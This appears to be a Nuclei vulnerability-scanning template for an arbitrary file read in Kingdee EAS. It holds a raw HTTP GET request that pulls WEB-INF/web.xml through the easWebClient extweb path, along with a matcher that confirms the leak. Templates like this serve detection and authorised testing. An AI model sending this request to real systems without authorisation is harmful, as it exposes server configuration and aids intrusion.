id: kingdee-eas-extweb-fileread

info:
  name: 金蝶EAS extweb 任意文件读取
  author: SleepingBag945
  severity: high



http:
  - raw:
      - |
        GET /easWebClient/deploy/client/ctrlhome/webapps/extweb/WEB-INF/web.xml HTTP/1.1
        Host: {{Hostname}}
        Cache-Control: max-age=0
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
        Accept-Encoding: gzip, deflate
        Accept-Language: zh-CN,zh-HK;q=0.9,zh;q=0.8
        Connection: close


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"<?xml","web-app")